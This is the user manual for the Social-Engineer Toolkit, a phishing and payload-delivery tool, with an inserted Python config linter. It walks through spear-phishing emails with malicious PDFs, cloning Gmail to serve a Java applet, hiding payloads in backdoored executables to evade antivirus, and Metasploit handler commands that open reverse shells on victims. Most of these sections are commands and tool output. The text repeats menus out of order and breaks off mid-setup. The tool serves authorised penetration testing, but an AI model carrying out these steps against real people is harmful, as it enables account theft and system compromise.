SET User Manual

Official User Manual
Made for version 1.0
By David Kennedy (ReL1K)
davek@social-engineer.org
http://www.secmaniac.com
http://www.social-engineer.org

Download: svn co http://svn.secmaniac.com/social_engineering_toolkit set/
Table of Contents

Beginning with the Social Engineer Toolkit ... 3
SET Menus ... 7
Spear-Phishing Attack Vector ... 12
Java Applet Attack Vector ... 17
Metasploit Browser Exploit Method ... 24
Credential Harvester Attack Method ... 28
Tabnabbing Attack Method ... 33
Man Left in the Middle Attack Method ... 35
Web Jacking Attack Method ... 36
Multi-Attack Web Vector ... 39
Infectious Media Generator ... 49
Teensy USB HID Attack Vector ... 53
SMS Spoofing Attack Vector ... 59
SET Automation ... 61
SET Web-Interface ... 65
Frequently Asked Questions ... 67
irc.freenode.net #social-engineer
The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the http://www.social-engineer.org launch and has quickly become a standard tool in a penetration tester's arsenal. SET is written by David Kennedy (ReL1K) and, with a lot of help from the community, it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be focused attacks against a person or organization used during a penetration test.
# SPECIFY WHAT INTERFACE YOU WANT ETTERCAP TO LISTEN ON, IF NOTHING WILL DEFAULT
# EXAMPLE: ETTERCAP_INTERFACE=wlan0
ETTERCAP_INTERFACE=eth0
#
# ETTERCAP HOME DIRECTORY (NEEDED FOR DNS_SPOOF)
ETTERCAP_PATH=/usr/share/ettercap
The Ettercap section can be used when you're on the same subnet as the victims and you want to perform DNS poison attacks against a subset of IP addresses. When this flag is set to ON, it will poison the entire local subnet and redirect a specific site or all sites to your malicious server.
# SENDMAIL ON OR OFF FOR SPOOFING EMAIL ADDRESSES
SENDMAIL=OFF
Setting the SENDMAIL flag to ON will try starting SENDMAIL, which can spoof source email addresses. This attack only works if the victim's SMTP server does not perform reverse lookups on the hostname. SENDMAIL must be installed. If you're using BackTrack 4, it is installed by default.
# SET TO ON IF YOU WANT TO USE EMAIL IN CONJUNCTION WITH WEB ATTACK
WEBATTACK_EMAIL=OFF
When setting WEBATTACK_EMAIL to ON, it will allow you to send mass emails to the victim while utilizing the Web Attack vector. Traditionally the emailing aspect is only available through the spear-phishing menu; however, when this is enabled it will add additional functionality for you to be able to email victims with links to help better your attacks.
# CREATE SELF-SIGNED JAVA APPLETS AND SPOOF PUBLISHER NOTE THIS REQUIRES YOU TO
# INSTALL ---> JAVA 6 JDK, BT4 OR UBUNTU USERS: apt-get install openjdk-6-jdk
# IF THIS IS NOT INSTALLED IT WILL NOT WORK. CAN ALSO DO apt-get install sun-java6-jdk
SELF_SIGNED_APPLET=OFF
The Java Applet Attack vector is the attack with one of the highest rates of success that SET has in its arsenal. To make the attack look more believable, you can turn this flag on, which will allow you to sign the Java Applet with whatever name you want. Say you're targeting CompanyX: the standard Java Applet is signed by Microsoft, but you can sign the applet with CompanyX to make it look more believable. This will require you to install Java's JDK (in Ubuntu it's apt-get install sun-java6-jdk or openjdk-6-jdk).
# THIS FLAG WILL SET THE JAVA ID FLAG WITHIN THE JAVA APPLET TO SOMETHING DIFFE$
# THIS COULD BE TO MAKE IT LOOK MORE BELIEVABLE OR FOR BETTER OBFUSCATION
JAVA_ID_PARAM=Secure Java Applet
#
# JAVA APPLET REPEATER OPTION WILL CONTINUE TO PROMPT THE USER WITH THE JAVA AP$
# THE USER HITS CANCEL. THIS MEANS IT WILL BE NON STOP UNTIL RUN IS EXECUTED. T$
# A BETTER SUCCESS RATE FOR THE JAVA APPLET ATTACK
JAVA_REPEATER=ON
When a user gets the Java applet warning, they will see "Secure Java Applet" as the name of the Applet instead of the IP address. This adds better believability to the Java applet. The second option will prompt the user over and over with nagging Java Applet warnings if they hit cancel. This is useful when the user clicks cancel and the attack would otherwise be rendered useless; instead it will continue to pop up over and over.
# AUTODETECTION OF IP ADDRESS INTERFACE UTILIZING GOOGLE, SET THIS ON IF YOU WANT
# SET TO AUTODETECT YOUR INTERFACE
AUTO_DETECT=ON
The AUTO_DETECT flag is probably one of the most asked questions in SET. In most cases, SET will grab the interface you use in order to connect out to the Internet and use that as the reverse connection and IP address. Most attacks need to be customized and may not be on the internal network. If you turn this flag to OFF, SET will prompt you with additional questions on setting up the attack. This flag should be used when you want to use multiple interfaces, have an external IP, or you're in a NAT/port forwarding scenario.
# SPECIFY WHAT PORT TO RUN THE HTTP SERVER OFF OF THAT SERVES THE JAVA APPLET ATTACK
# OR METASPLOIT EXPLOIT. DEFAULT IS PORT 80.
WEB_PORT=80
By default the SET web server listens on port 80. If for some reason you need to change this, you can specify an alternative port.
# CUSTOM EXE YOU WANT TO USE FOR METASPLOIT ENCODING, THIS USUALLY HAS BETTER AV
# DETECTION. CURRENTLY IT IS SET TO LEGIT.BINARY WHICH IS JUST CALC.EXE. AN EXAMPLE
# YOU COULD USE WOULD BE PUTTY.EXE SO THIS FIELD WOULD BE /pathtoexe/putty.exe
CUSTOM_EXE=src/exe/legit.binary
When using the payload encoding options of SET, the best option for Anti-Virus bypass is the backdoored executable option, that is, an executable loaded with a malicious payload hidden in the exe. Specifically, an exe is backdoored with a Metasploit based payload and can generally evade most AVs out there. SET has an executable built into it for the backdooring of the exe; however, if for some reason you want to use a different executable, you can specify the path to that exe with the CUSTOM_EXE flag.
# USE APACHE INSTEAD OF STANDARD PYTHON WEB SERVERS, THIS WILL INCREASE SPEED OF
# THE ATTACK VECTOR
APACHE_SERVER=OFF
#
# PATH TO THE APACHE WEBROOT
APACHE_DIRECTORY=/var/www
The web server utilized within SET is a custom-coded web server that at times can be somewhat slow, depending on the needs. If you find that you need a boost and want to utilize Apache, you can flip this switch to ON and it will use Apache to handle the web requests and speed your attack up. Note that this option only works with the Java Applet and Metasploit based attacks. Because they rely on intercepting credentials, Apache cannot be used with the web jacking, tabnabbing, or credential harvester attack methods.
# TURN ON SSL CERTIFICATES FOR SET SECURE COMMUNICATIONS THROUGH WEB_ATTACK VECTOR
WEBATTACK_SSL=OFF
#
# PATH TO THE PEM FILE TO UTILIZE CERTIFICATES WITH THE WEB ATTACK VECTOR (REQUIRED)
# YOU CAN CREATE YOUR OWN UTILIZING SET, JUST TURN ON SELF_SIGNED_CERT
# IF YOUR USING THIS FLAG, ENSURE OPENSSL IS INSTALLED!
#
SELF_SIGNED_CERT=OFF
#
# BELOW IS THE CLIENT/SERVER (PRIVATE) CERT, THIS MUST BE IN PEM FORMAT IN ORDER TO WORK
# SIMPLY PLACE THE PATH YOU WANT FOR EXAMPLE /root/ssl_client/server.pem
PEM_CLIENT=/root/newcert.pem
PEM_SERVER=/root/newreq.pem
In some cases when you're performing an advanced social-engineer attack you may want to register a domain and buy an SSL cert that makes the attack more believable. You can incorporate SSL based attacks with SET. You will need to turn WEBATTACK_SSL to ON. If you want to use self-signed certificates you can as well; however, there will be an untrusted warning when a victim goes to your website.
# TWEAK THE WEB JACKING TIME USED FOR THE IFRAME REPLACE, SOMETIMES IT CAN BE A LITTLE SLOW
# AND HARDER TO CONVINCE THE VICTIM. 5000 = 5 seconds
WEBJACKING_TIME=2000
The webjacking attack is performed by replacing the victim's browser with another window that is made to look and appear to be a legitimate site. This attack is very dependent on timing: if you're doing it over the Internet, I recommend the delay to be 5000 (5 seconds); otherwise, if you're internal, 2000 (2 seconds) is probably a safe bet.
The command center is the web GUI interface for the Social-Engineer Toolkit. If you want to use this on a different port, change this number.

The next option will specify what interface to listen on for the SET web interface. If it's set to 127.0.0.1, it means that no one from outside on the network can hit the web interface. If you place it to 0.0.0.0, it will bind to all interfaces and it can be reached remotely. Be careful with this setting.

The encount flag determines how many times a payload will be encoded with Metasploit payloads when in SET. By default it's 4, but if you require less or more, you can adjust this accordingly.
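Every flag above lives in the same set_config format: one KEY=VALUE per line, '#' comment lines, and values that may contain spaces (JAVA_ID_PARAM=Secure Java Applet). The parser and linter below is an added example written for this manual, not code from SET itself; it reads that format and checks the dependencies the text describes (WEBATTACK_SSL needs both PEM paths unless SELF_SIGNED_CERT is ON, APACHE_SERVER needs APACHE_DIRECTORY, ON/OFF and numeric flags hold sane values) against a constructed sample config.

```python
import re

# Flags the manual documents as plain ON/OFF switches.
ON_OFF_FLAGS = {
    "SENDMAIL", "WEBATTACK_EMAIL", "SELF_SIGNED_APPLET", "JAVA_REPEATER",
    "AUTO_DETECT", "APACHE_SERVER", "WEBATTACK_SSL", "SELF_SIGNED_CERT",
}
# Flags whose value must be a whole number (a port, a delay in milliseconds).
NUMERIC_FLAGS = {"WEB_PORT", "WEBJACKING_TIME"}

KEY_RE = re.compile(r"[A-Z][A-Z0-9_]*")


def parse_set_config(text):
    """Parse set_config text into ({KEY: value}, [errors]).

    The layout rules come from the excerpts above: '#' starts a comment (a bare
    '#' is just a spacer), blank lines are ignored, and a value runs to the end
    of the line, so 'JAVA_ID_PARAM=Secure Java Applet' keeps its spaces.
    """
    settings, errors = {}, []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        key = key.strip()
        if not sep or not KEY_RE.fullmatch(key):
            errors.append(f"line {lineno}: not a KEY=VALUE setting: {line!r}")
            continue
        if key in settings:
            errors.append(f"line {lineno}: {key} is set more than once")
        settings[key] = value.strip()
    return settings, errors


def lint_set_config(settings):
    """Return warnings for values and combinations the manual says will not work."""
    warnings = []
    for key in sorted(ON_OFF_FLAGS & set(settings)):
        if settings[key] not in ("ON", "OFF"):
            warnings.append(f"{key} must be ON or OFF, got {settings[key]!r}")
    for key in sorted(NUMERIC_FLAGS & set(settings)):
        if not settings[key].isdigit():
            warnings.append(f"{key} must be a whole number, got {settings[key]!r}")
    port = settings.get("WEB_PORT", "")
    if port.isdigit() and not 1 <= int(port) <= 65535:
        warnings.append(f"WEB_PORT {port} is outside 1-65535")
    # SSL needs both PEM paths unless SET is told to generate a self-signed pair.
    if settings.get("WEBATTACK_SSL") == "ON" and settings.get("SELF_SIGNED_CERT") != "ON":
        for pem in ("PEM_CLIENT", "PEM_SERVER"):
            if not settings.get(pem):
                warnings.append(
                    f"WEBATTACK_SSL=ON needs a PEM path in {pem} (or SELF_SIGNED_CERT=ON)")
    # Serving through Apache needs the webroot the cloned site is written to.
    if settings.get("APACHE_SERVER") == "ON" and not settings.get("APACHE_DIRECTORY"):
        warnings.append("APACHE_SERVER=ON requires APACHE_DIRECTORY")
    return warnings


def check_config(text):
    """Parse then lint; returns (settings, problems) where problems = errors + warnings."""
    settings, errors = parse_set_config(text)
    return settings, errors + lint_set_config(settings)


# Constructed sample (not the shipped file): a few lines in the manual's layout,
# with SSL turned on but PEM_SERVER left blank and a bad value for APACHE_SERVER.
SAMPLE_CONFIG = """\
# SENDMAIL ON OR OFF FOR SPOOFING EMAIL ADDRESSES
SENDMAIL=OFF
#
# THIS COULD BE TO MAKE IT LOOK MORE BELIEVABLE OR FOR BETTER OBFUSCATION
JAVA_ID_PARAM=Secure Java Applet
JAVA_REPEATER=ON
WEB_PORT=80
WEBATTACK_SSL=ON
SELF_SIGNED_CERT=OFF
PEM_CLIENT=/root/newcert.pem
PEM_SERVER=
WEBJACKING_TIME=2000
APACHE_SERVER=maybe
"""

if __name__ == "__main__":
    _, problems = check_config(SAMPLE_CONFIG)
    for problem in problems:
        print("!", problem)
```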
SET Menus
SET is a menu-driven attack system, which is fairly unique when it comes to hacker tools. The decision not to make it command line was made because of how social-engineer attacks occur; they require multiple scenarios, options, and customizations. If the tool had been command line based it would have really limited the effectiveness of the attacks and the ability to fully customize it based on your target. Let's dive into the menu and do a brief walkthrough of each attack vector.
root@bt:/pentest/exploits/set# ./set

[---]       The Social-Engineer Toolkit (SET)        [---]
[---]       Written by David Kennedy (ReL1K)         [---]
[---]                Version: 1.0                    [---]
[---]           Codename: 'Ninja Edition'            [---]
[---]   Report bugs to: davek@social-engineer.org    [---]
[---]      Follow Me On Twitter: dave_rel1k          [---]
[---]   Java Applet Written by: Thomas Werth         [---]
[---]     Homepage: http://www.secmaniac.com         [---]
[---]   Framework: http://www.social-engineer.org    [---]
[---]  Over 1.4 million downloads and counting.      [---]

Welcome to the Social-Engineer Toolkit (SET). Your one stop shop for all of your social-engineering needs..

DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com

Select from the menu:

1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. SMS Spoofing Attack Vector
8. Update the Metasploit Framework
9. Update the Social-Engineer Toolkit
10. Help, Credits, and About
11. Exit the Social-Engineer Toolkit

Enter your choice: 1
Welcome to the SET E-Mail attack method. This module allows you to specially craft email messages and send them to a large (or small) number of people with attached fileformat malicious payloads. If you want to spoof your email address, be sure "Sendmail" is installed (it is installed in BT4) and change the config/set_config SENDMAIL=OFF flag to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do everything for you (option 1), the second is to create your own FileFormat payload and use it in your own attack. Either way, good luck and enjoy!

1. Perform a Mass Email Attack
2. Create a FileFormat Payload
3. Create a Social-Engineering Template
4. Return to Main Menu

Enter your choice:
The spear-phishing attack menu is used for performing targeted email attacks against a victim. You can send multiple emails based on what you've harvested, or you can send it to individuals. You can also utilize a fileformat exploit (for example a PDF bug) and send the malicious attack to the victim in order to hopefully compromise the system.
Select from the menu:

1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. Update the Metasploit Framework
8. Update the Social-Engineer Toolkit
9. Help, Credits, and About
10. Exit the Social-Engineer Toolkit

Enter your choice: 2
The Social-Engineer Toolkit "Web Attack" vector is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.

Enter what type of attack you would like to utilize.

The Java Applet attack will spoof a Java Certificate and deliver a Metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.

The Metasploit browser exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.

The Credential Harvester Method will utilize web cloning of a website that has a username and password field and harvest all the information posted to the website.

The TabNabbing Method will wait for a user to move to a different tab, then refresh the page to something different.

The Man Left in the Middle Attack Method was introduced by Kos and utilizes HTTP REFERER's in order to intercept fields and harvest data from them. You need to have an already vulnerable site and incorporate <script src="http://YOURIP/">. This could either be from a compromised site or through XSS.

The web jacking attack method was introduced by white_sheep, Emgent and the Back|Track team. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its to slow/fast.

The multi-attack will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing, and the Man Left in the Middle attack all at once to see which is successful.

1. The Java Applet Attack Method
2. The Metasploit Browser Exploit Method
3. Credential Harvester Attack Method
4. Tabnabbing Attack Method
5. Man Left in the Middle Attack Method
6. Web Jacking Attack Method
7. Multi-Attack Web Method
8. Return to the previous menu

Enter your choice (press enter for default):
The web attack vector is used by performing phishing attacks against the victim in hopes they click the link. There is a wide variety of attacks that can occur once they click. We will dive into each one of the attacks later on.
3. Infectious Media Generator

The infectious USB/DVD creator will develop a Metasploit based payload for you and craft an autorun.inf file that, once burned or placed on a USB, will trigger an autorun feature and hopefully compromise the system. This attack vector is relatively simple in nature and relies on deploying the devices to the physical system.
4. Create a Payload and Listener

The create payload and listener is an extremely simple wrapper around Metasploit to create a payload, export the exe for you and generate a listener. You would need to transfer the exe onto the victim machine and execute it in order for it to properly work.
5. Mass Mailer Attack

The mass mailer attack will allow you to send multiple emails to victims and customize the messages. This option does not allow you to create payloads, so it is generally used to perform a mass phishing attack.
Select from the menu:

1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. SMS Spoofing Attack Vector
8. Update the Metasploit Framework
9. Update the Social-Engineer Toolkit
10. Help, Credits, and About
11. Exit the Social-Engineer Toolkit

Enter your choice: 6
Welcome to the Teensy HID Attack Vector.

Special thanks to: IronGeek and WinFang

The Teensy HID Attack Vector utilizes the teensy USB device to program the device to act as a keyboard. Teensy's have onboard storage and can allow for remote code execution on the physical system. Since the devices are registered as USB Keyboard's it will bypass any autorun disabled or endpoint protection on the system.

You will need to purchase the Teensy USB device, it's roughly $22 dollars.

This attack vector will auto generate the code needed in order to deploy the payload on the system for you.

This attack vector will create the .pde files necessary to import into Arduino (the IDE used for programming the Teensy). The attack vectors range from Powershell based downloaders, wscript attacks, and other methods.

For more information on specifications and good tutorials visit:
http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle

To purchase a Teensy, visit: http://www.pjrc.com/store/teensy.html

Select a payload to create the pde file to import into Arduino:

1. Powershell HTTP GET MSF Payload
2. WSCRIPT HTTP GET MSF Payload
3. Powershell based Reverse Shell
4. Return to the main menu.

Enter your choice:
The Teensy USB HID attack is a method used by purchasing a hardware based device from pjrc.com and programming it in a manner that makes the small USB microcontroller look and feel exactly like a keyboard. The important part with this is it bypasses autorun capabilities and can drop payloads onto the system through the onboard flash memory. The keyboard simulation allows you to type characters in a manner that can utilize downloaders and exploit the system.
7. Update the Metasploit Framework
8. Update the Social-Engineer Toolkit
9. Help, Credits, and About
10. Exit the Social-Engineer Toolkit
The following menus will perform updates on Metasploit, the Social-Engineer Toolkit, provide help and credits, and lastly exit the Social-Engineer Toolkit (why would you ever want to do that?!).
As mentioned previously, the spear phishing attack vector can be used to send targeted emails with malicious attachments. In this example we are going to craft an attack, integrate into GMAIL and send a malicious PDF to the victim. One thing to note is you can create and save your own templates to use for future SE attacks or you can use pre-built ones. When using SET, just note that when hitting enter for defaults, it will always use port 443 as the reverse connection back and a reverse Meterpreter.
Select from the menu:

1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. SMS Spoofing Attack Vector
8. Update the Metasploit Framework
9. Update the Social-Engineer Toolkit
10. Help, Credits, and About
11. Exit the Social-Engineer Toolkit

Enter your choice: 1
Welcome to the SET E-Mail attack method. This module allows you to specially craft email messages and send them to a large (or small) number of people with attached fileformat malicious payloads. If you want to spoof your email address, be sure "Sendmail" is installed (it is installed in BT4) and change the config/set_config SENDMAIL=OFF flag to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do everything for you (option 1), the second is to create your own FileFormat payload and use it in your own attack. Either way, good luck and enjoy!

1. Perform a Mass Email Attack
2. Create a FileFormat Payload
3. Create a Social-Engineering Template
4. Return to Main Menu

Enter your choice: 1
Select the file format exploit you want.
The default is the PDF embedded EXE.

********** PAYLOADS **********

1. SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2. Adobe Flash Player 'Button' Remote Code Execution
3. Adobe CoolType SING Table 'uniqueName' Overflow
4. Adobe Flash Player 'newfunction' Invalid Pointer Use
5. Adobe Collab.collectEmailInfo Buffer Overflow
6. Adobe Collab.getIcon Buffer Overflow
7. Adobe JBIG2Decode Memory Corruption Exploit
8. Adobe PDF Embedded EXE Social Engineering
9. Adobe util.printf() Buffer Overflow
10. Custom EXE to VBA (sent via RAR) (RAR required)
11. Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
12. Adobe PDF Embedded EXE Social Engineering (NOJS)

Enter the number you want (press enter for default): 1

1. Windows Reverse TCP Shell
2. Windows Meterpreter Reverse_TCP
3. Windows Reverse VNC
4. Windows Reverse TCP Shell (x64)
5. Windows Meterpreter Reverse_TCP (X64)
6. Windows Shell Bind_TCP (X64)

Enter the payload you want (press enter for default):
[*] Windows Meterpreter Reverse TCP selected.
Enter the port to connect back on (press enter for default):
[*] Defaulting to port 443...
[*] Generating fileformat exploit...
[*] Please wait while we load the module tree...
[*] Started reverse handler on 172.16.32.129:443
[*] Creating 'template.pdf' file...
[*] Generated output file /pentest/exploits/set/src/program_junk/template.pdf
[*] Payload creation complete.
[*] All payloads get sent to the src/msf_attacks/template.pdf directory
[*] Payload generation complete. Press enter to continue.
As an added bonus, use the file-format creator in SET to create your attachment.

Right now the attachment will be imported with filename of 'template.whatever'

Do you want to rename the file?

example Enter the new filename: moo.pdf

1. Keep the filename, I don't care.
2. Rename the file, I want to be cool.

Enter your choice (enter for default): 1
Keeping the filename and moving on.
Social Engineer Toolkit Mass E-Mailer

There are two options on the mass e-mailer, the first would be to send an email to one individual person. The second option will allow you to import a list and send it to as many people as you want within that list.

What do you want to do:

1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
3. Return to main menu.

Enter your choice: 1

Do you want to use a predefined template or craft a one time email template.

1. Pre-Defined Template
2. One-Time Use Email Template

Enter your choice: 1

Below is a list of available templates:

1: Baby Pics
2: Strange Internet usage from your computer
3: New Update
4: LOL...have to check this out...
5: Dan Brown's Angels & Demons
6: Computer Issue
7: Status Report

Enter the number you want to use: 7

Enter who you want to send email to: kennedyd013@gmail.com

What option do you want to use?

1. Use a GMAIL Account for your email attack.
2. Use your own server or open relay

Enter your choice: 1

Enter your GMAIL email address: kennedyd013@gmail.com
Enter your password for gmail (it will not be displayed back to you):

SET has finished delivering the emails.

Do you want to setup a listener yes or no: yes
[-] ***
[-] * WARNING: No database support: String User Disabled Database Support
[-] ***

       =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 588 exploits - 300 auxiliary
+ -- --=[ 224 payloads - 27 encoders - 8 nops
       =[ svn r10268 updated today (2010.09.09)

resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 172.16.32.129
LHOST => 172.16.32.129
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 172.16.32.129:443
[*] Starting the payload handler...
msf exploit(handler) >
Once the attack is all setup, the victim opens the email and opens the PDF up:

As soon as the victim opens the attachment up, a shell is presented back to us:

[*] Sending stage (748544 bytes) to 172.16.32.131
[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1139) at Thu Sep 09 09:58:06 -0400 2010

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 3940 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>
The spear-phishing attack can send to multiple people or individuals; it integrates into Google mail and can be completely customized based on your needs for the attack vector. Overall this is very effective for email spear-phishing.

The Java Applet is one of the core attack vectors within SET and has the highest success rate for compromise. The Java Applet attack will create a malicious Java Applet that once run will completely compromise the victim. The neat trick with SET is that you can completely clone a website and, once the victim has clicked run, it will redirect the victim back to the original site, making the attack much more believable. This attack vector affects Windows, Linux, and OSX and can compromise them all. Remember, if you want to customize this attack vector, edit the config/set_config in order to change the self-signed information.

In this specific attack vector, you can select web templates, which are pre-defined websites that have already been harvested, or you can import your own website. In this example we will be using the site cloner which will clone a website for us. Let's launch SET and prep our attack.
Select from the menu:

1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. SMS Spoofing Attack Vector
8. Update the Metasploit Framework
9. Update the Social-Engineer Toolkit
10. Help, Credits, and About
11. Exit the Social-Engineer Toolkit

Enter your choice: 2
The Social-Engineer Toolkit "Web Attack" vector is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.

Enter what type of attack you would like to utilize.

The Java Applet attack will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.

The Metasploit browser exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.

The Credential Harvester Method will utilize web cloning of a website that has a username and password field and harvest all the information posted to the website.

The TabNabbing Method will wait for a user to move to a different tab, then refresh the page to something different.

The Man Left in the Middle Attack Method was introduced by Kos and utilizes HTTP REFERER's in order to intercept fields and harvest data from them. You need to have an already vulnerable site and incorporate <script src="http://YOURIP/">. This could either be from a compromised site or through XSS.

The web jacking attack method was introduced by white_sheep, Emgent and the Back|Track team. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its to slow/fast.

The multi-attack will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing, and the Man Left in the Middle attack all at once to see which is successful.

1. The Java Applet Attack Method
2. The Metasploit Browser Exploit Method
3. Credential Harvester Attack Method
4. Tabnabbing Attack Method
5. Man Left in the Middle Attack Method
6. Web Jacking Attack Method
7. Multi-Attack Web Method
8. Return to the previous menu

Enter your choice (press enter for default): 1
The first method will allow SET to import a list of pre-defined web applications that it can utilize within the attack. The second method will completely clone a website of your choosing and allow you to utilize the attack vectors within the exact same web application you were attempting to clone. The third method allows you to import your own website; note that you should only have an index.html when using the import website functionality.

[!] Website Attack Vectors [!]

1. Web Templates
2. Site Cloner
3. Custom Import
4. Return to main menu

Enter number (1-4): 2

SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: https://gmail.com
[*] Cloning the website: https://gmail.com
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: tgbYm1k69
[*] Malicious java applet website prepped for deployment

What payload do you want to generate:

   Name:                                 Description:

1. Windows Shell Reverse_TCP             Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter       Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL           Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell                    Execute payload and create an accepting port on remote system.
5. Windows Bind Shell X64                Windows x64 Command Shell, Bind TCP Inline
6. Windows Shell Reverse_TCP X64         Windows X64 Command Shell, Reverse TCP Inline
7. Windows Meterpreter Reverse_TCP X64   Connect back to the attacker (Windows x64), Meterpreter
8. Windows Meterpreter Egress Buster     Spawn a meterpreter shell and find a port home via multiple ports
9. Import your own executable            Specify a path for your own executable

Enter choice (hit enter for default): 2
Below is a list of encodings to try and bypass AV.
Select one of the below, 'backdoored executable' is typically the best.

1. avoid_utf8_tolower (Normal)
2. shikata_ga_nai (Very Good)
3. alpha_mixed (Normal)
4. alpha_upper (Normal)
5. call4_dword_xor (Normal)
6. countdown (Normal)
7. fnstenv_mov (Normal)
8. jmp_call_additive (Normal)
9. nonalpha (Normal)
10. nonupper (Normal)
11. unicode_mixed (Normal)
12. unicode_upper (Normal)
13. alpha2 (Normal)
14. No Encoding (None)
15. Multi-Encoder (Excellent)
16. Backdoored Executable (BEST)

Enter your choice (enter for default): 16
[-] Enter the PORT of the listener (enter for default): 443
[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[-] Backdoor completed successfully. Payload is now hidden within a legit executable.

********************************************************
Do you want to create a Linux/OSX reverse_tcp payload
in the Java Applet attack as well?
********************************************************

Enter choice yes or no: yes
Enter the port to listen for on OSX: 8080
Enter the port to listen for on Linux: 8081

Created by msfpayload (http://www.metasploit.com).
Payload: osx/x86/shell_reverse_tcp
Length: 65
Options: LHOST=172.16.32.129,LPORT=8080

Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell/reverse_tcp
Length: 50
Options: LHOST=172.16.32.129,LPORT=8081
***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************

[--] Tested on IE6, IE7, IE8, Safari, Chrome, and FireFox [--]

[*] Launching MSF Listener...
[*] This may take a few to load MSF...
[-] ***
[-] * WARNING: No database support: String User Disabled Database Support
[-] ***
[Metasploit ASCII-art banner]
       =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 588 exploits - 300 auxiliary
+ -- --=[ 224 payloads - 27 encoders - 8 nops
       =[ svn r10268 updated today (2010.09.09)
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD osx/x86/shell_reverse_tcp
PAYLOAD => osx/x86/shell_reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 172.16.32.129
LHOST => 172.16.32.129
resource (src/program_junk/meta_config)> set LPORT 8080
LPORT => 8080
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
[*] Started reverse handler on 0.0.0.0:443
resource (src/program_junk/meta_config)> exploit -j
[*] Starting the payload handler...
[*] Exploit running as background job.
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD linux/x86/shell/reverse_tcp
PAYLOAD => linux/x86/shell/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 172.16.32.129
LHOST => 172.16.32.129
resource (src/program_junk/meta_config)> set LPORT 8081
LPORT => 8081
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> set AutoRunScript migrate -f
